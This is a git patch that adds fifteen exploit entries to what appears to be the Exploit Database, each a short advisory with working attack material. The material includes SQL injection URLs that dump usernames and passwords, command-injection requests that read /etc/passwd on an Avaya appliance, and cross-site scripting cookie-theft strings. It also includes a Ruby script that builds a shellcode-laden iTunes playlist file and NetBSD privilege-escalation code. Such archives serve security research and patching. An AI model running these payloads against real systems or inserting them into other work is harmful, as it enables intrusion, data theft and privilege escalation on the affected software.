From b20d2a307448e730f85cd6f9483cfe2daaf67d14 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 9 May 2014 04:36:24 +0000 Subject: [PATCH] Updated 05_09_2014 --- files.csv | 15 ++++++++ platforms/asp/webapps/33236.txt | 7 ++++ platforms/bsd/local/33229.c | 31 +++++++++++++++ platforms/cgi/webapps/33231.txt | 27 ++++++++++++++ platforms/hardware/remote/33234.txt | 35 +++++++++++++++++ platforms/linux/dos/33230.txt | 12 ++++++ platforms/linux/dos/33233.txt | 10 +++++ platforms/linux/local/33228.txt | 9 +++++ platforms/osx/dos/33235.rb | 58 +++++++++++++++++++++++++++++ platforms/php/webapps/33232.txt | 12 ++++++ platforms/php/webapps/33237.txt | 9 +++++ platforms/php/webapps/33238.txt | 7 ++++ platforms/php/webapps/33239.txt | 11 ++++++ platforms/php/webapps/33240.txt | 8 ++++ platforms/php/webapps/33241.txt | 7 ++++ platforms/php/webapps/33242.txt | 8 ++++ 16 files changed, 266 insertions(+) create mode 100755 platforms/asp/webapps/33236.txt create mode 100755 platforms/bsd/local/33229.c create mode 100755 platforms/cgi/webapps/33231.txt create mode 100755 platforms/hardware/remote/33234.txt create mode 100755 platforms/linux/dos/33230.txt create mode 100755 platforms/linux/dos/33233.txt create mode 100755 platforms/linux/local/33228.txt create mode 100755 platforms/osx/dos/33235.rb create mode 100755 platforms/php/webapps/33232.txt create mode 100755 platforms/php/webapps/33237.txt create mode 100755 platforms/php/webapps/33238.txt create mode 100755 platforms/php/webapps/33239.txt create mode 100755 platforms/php/webapps/33240.txt create mode 100755 platforms/php/webapps/33241.txt create mode 100755 platforms/php/webapps/33242.txt diff --git a/files.csv b/files.csv index 113b4dd0d..151e812c9 100755 --- a/files.csv +++ b/files.csv @@ -29953,3 +29953,18 @@ id,file,description,date,author,platform,type,port 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 +33228,platforms/linux/local/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow Vulnerability",2009-09-16,"Xiao Guangrong",linux,local,0 +33229,platforms/bsd/local/33229.c,"NetBSD <= 5.0.1 'IRET' General Protection Fault Handling Local Privilege Escalation Vulnerability",2009-09-16,"Tavis Ormandy",bsd,local,0 +33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x 'strfmon()' Function Integer Overflow Weakness",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 +33231,platforms/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps,0 +33232,platforms/php/webapps/33232.txt,"MyBB 1.4.8 'search.php' SQL Injection Vulnerability",2009-09-19,$qL_DoCt0r,php,webapps,0 +33233,platforms/linux/dos/33233.txt,"FFmpeg Version 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0 +33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 '/Login/Login' Arbitrary Script Injection Vulnerability",2009-09-21,"Stefan Friedli",hardware,remote,0 +33235,platforms/osx/dos/33235.rb,"Apple iTunes <= 9.0 '.pls' File Buffer Overflow Vulnerability",2009-09-22,"Roger Hart",osx,dos,0 +33236,platforms/asp/webapps/33236.txt,"MaxWebPortal 1.365 'forum.asp' SQL Injection Vulnerability",2009-09-22,OoN_Boy,asp,webapps,0 +33237,platforms/php/webapps/33237.txt,"Joomla! SportFusion 0.2.x Component SQL Injection Vulnerability",2009-09-22,kaMtiEz,php,webapps,0 +33238,platforms/php/webapps/33238.txt,"Joomla! JoomlaFacebook Component SQL Injection Vulnerability",2009-09-22,kaMtiEz,php,webapps,0 +33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone 'view_products.php' SQL Injection Vulnerability",2009-09-22,OoN_Boy,php,webapps,0 +33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 +33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0 +33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection Vulnerability",2009-09-23,OoN_Boy,php,webapps,0 diff --git a/platforms/asp/webapps/33236.txt b/platforms/asp/webapps/33236.txt new file mode 100755 index 000000000..12e1acc37 --- /dev/null +++ b/platforms/asp/webapps/33236.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36480/info + +MaxWebPortal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/forum.asp?FORUM_ID=42&CAT_ID=7+and+1=convert%28int,@@version%29-- \ No newline at end of file diff --git a/platforms/bsd/local/33229.c b/platforms/bsd/local/33229.c new file mode 100755 index 000000000..330aea366 --- /dev/null +++ b/platforms/bsd/local/33229.c @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/36430/info + +NetBSD is prone to a local privilege-escalation vulnerability. + +A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks. + +/* ... */ +int main(int argc, char **argv) +{ + jmp_buf env; + + void handlesig(int n) { + longjmp(env, 1); + + } + signal(SIGSEGV, handlesig); + + if (setjmp(env) == 0) { + ( (void(*)(void)) NULL) (); + } + + return 0; +} + +/* ... */ +int main(int argc, char **argv) +{ + char baguette; + signal(SIGABRT, (void (*)(int))&baguette); + abort(); +} diff --git a/platforms/cgi/webapps/33231.txt b/platforms/cgi/webapps/33231.txt new file mode 100755 index 000000000..5a807a0ea --- /dev/null +++ b/platforms/cgi/webapps/33231.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/36450/info + +Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including: + +1. Multiple remote command-execution vulnerabilities +2. A cross-site request-forgery vulnerability +3. A cross-site scripting vulnerability + +Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible. + +POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1 +ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56 + +POST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1 +ipadd=;cat+/etc/passwd + +POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1 +ipadd=&count_p=1;ls&size_p=56 + +POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1 +ipadd=&count_p=1&size_p=56&opt_n=;ls + +POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1 +host_or_ip=127.0.0.1&r_type=;ls; + +https://www.example.com/cgi-bin/smallmenu.pl?url=%3C/ +title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/hardware/remote/33234.txt b/platforms/hardware/remote/33234.txt new file mode 100755 index 000000000..e2c0cf00a --- /dev/null +++ b/platforms/hardware/remote/33234.txt @@ -0,0 +1,35 @@ +source: http://www.securityfocus.com/bid/36466/info + +Check Point Connectra is prone to an arbitrary-script-injection vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to execute arbitrary script code in the context of the webserver. Successful exploits can compromise the application. + +--- CUT --- +POST https://www.example.com:443/Login/Login HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) +Gecko/20090729 Firefox/3.5.2 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: https://www.example.com/Login/Login?LangCode= +Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US +Content-Type: application/x-www-form-urlencoded +Content-length: 153 + +loginType=Standard&userName=&vpid_prefix="> +--- CUT END --- diff --git a/platforms/linux/dos/33230.txt b/platforms/linux/dos/33230.txt new file mode 100755 index 000000000..383bb842b --- /dev/null +++ b/platforms/linux/dos/33230.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/36443/info + +GNU glibc is prone to an integer-overflow weakness. + +An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +GNU glibc 2.10.1 and prior are vulnerable. + +The following proof-of-concept commands are available: + +php -r 'money_format("%.1073741821i",1);' +php -r 'money_format("%.1343741821i",1);' \ No newline at end of file diff --git a/platforms/linux/dos/33233.txt b/platforms/linux/dos/33233.txt new file mode 100755 index 000000000..17965be9d --- /dev/null +++ b/platforms/linux/dos/33233.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/36465/info + +FFmpeg is prone to multiple remote vulnerabilities. + +Attackers may leverage these issues to execute arbitrary code in the context of the application or crash the application. + +FFmpeg 0.5 is affected; other versions may also be vulnerable. + +http://www.exploit-db.com/sploits/33233-1.zip +http://www.exploit-db.com/sploits/33233-2.zip \ No newline at end of file diff --git a/platforms/linux/local/33228.txt b/platforms/linux/local/33228.txt new file mode 100755 index 000000000..65aed6505 --- /dev/null +++ b/platforms/linux/local/33228.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36423/info + +The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +Local attackers may be able to exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts may crash the affected kernel, denying service to legitimate users. + +The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable. + +http://www.exploit-db.com/sploits/33228.tgz \ No newline at end of file diff --git a/platforms/osx/dos/33235.rb b/platforms/osx/dos/33235.rb new file mode 100755 index 000000000..62df36014 --- /dev/null +++ b/platforms/osx/dos/33235.rb @@ -0,0 +1,58 @@ +source: http://www.securityfocus.com/bid/36478/info + +Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. + +An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +Versions prior to Apple iTunes 9.0.1 are vulnerable. + +#!/usr/bin/env ruby + +SETJMP = 0x92F04224 +JMP_BUF = 0x8fe31290 +STRDUP = 0x92EED110 +# 8fe24459 jmp *%eax +JMP_EAX = 0x8fe24459 + +def make_exec_payload_from_heap_stub() +frag0 = +"\x90" + # nop +"\x58" + # pop eax +"\x61" + # popa +"\xc3" # ret +frag1 = +"\x90" + # nop +"\x58" + # pop eax +"\x89\xe0" + # mov eax, esp +"\x83\xc0\x0c" + # add eax, byte +0xc +"\x89\x44\x24\x08" + # mov [esp+0x8], eax +"\xc3" # ret +exec_payload_from_heap_stub = +frag0 + +[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") + +frag1 + +"X" * 20 + +[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP, +JMP_EAX].pack("V5") + +"X" * 4 +end + +payload_cmd = "hereisthetrick" +stub = make_exec_payload_from_heap_stub() +ext = "A" * 59 +stub = make_exec_payload_from_heap_stub() +exploit = ext + stub + payload_cmd + +# pls file format + +file = "[playlist]\n" +file += "NumberOfEntries=1\n" +file += "File1=http://1/asdf." + exploit + "\n" +file += "Title1=asdf\n" +file += "Length1=100\n" +file += "Version=2" + '\n' + +File.open('poc.pls','w') do |f| +f.puts file +f.close +end diff --git a/platforms/php/webapps/33232.txt b/platforms/php/webapps/33232.txt new file mode 100755 index 000000000..d84d91050 --- /dev/null +++ b/platforms/php/webapps/33232.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/36460/info + +MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +MyBB 1.4.8 is vulnerable; other versions may also be affected. + +The following examples are available: + +simple query: ' or 1=1-- +blind query: ' having 1=1-- \ No newline at end of file diff --git a/platforms/php/webapps/33237.txt b/platforms/php/webapps/33237.txt new file mode 100755 index 000000000..cbc11b97b --- /dev/null +++ b/platforms/php/webapps/33237.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36481/info + +The SportFusion component ('com_sportfusion') for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SportFusion 0.2.2 and 0.2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33238.txt b/platforms/php/webapps/33238.txt new file mode 100755 index 000000000..775b2c2be --- /dev/null +++ b/platforms/php/webapps/33238.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36484/info + +The JoomlaFacebook component ('com_facebook') for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33239.txt b/platforms/php/webapps/33239.txt new file mode 100755 index 000000000..6d379c749 --- /dev/null +++ b/platforms/php/webapps/33239.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/36485/info + +Cosmetics Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following URIs are available: + +http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True + +http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False \ No newline at end of file diff --git a/platforms/php/webapps/33240.txt b/platforms/php/webapps/33240.txt new file mode 100755 index 000000000..ff6cab56c --- /dev/null +++ b/platforms/php/webapps/33240.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/36487/info + +DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True +http://www.example.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False \ No newline at end of file diff --git a/platforms/php/webapps/33241.txt b/platforms/php/webapps/33241.txt new file mode 100755 index 000000000..44a858829 --- /dev/null +++ b/platforms/php/webapps/33241.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36487/info + +DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/view_mag.php?mag_id= \ No newline at end of file diff --git a/platforms/php/webapps/33242.txt b/platforms/php/webapps/33242.txt new file mode 100755 index 000000000..a4b62e879 --- /dev/null +++ b/platforms/php/webapps/33242.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/36503/info + +Agent Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True +http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False \ No newline at end of file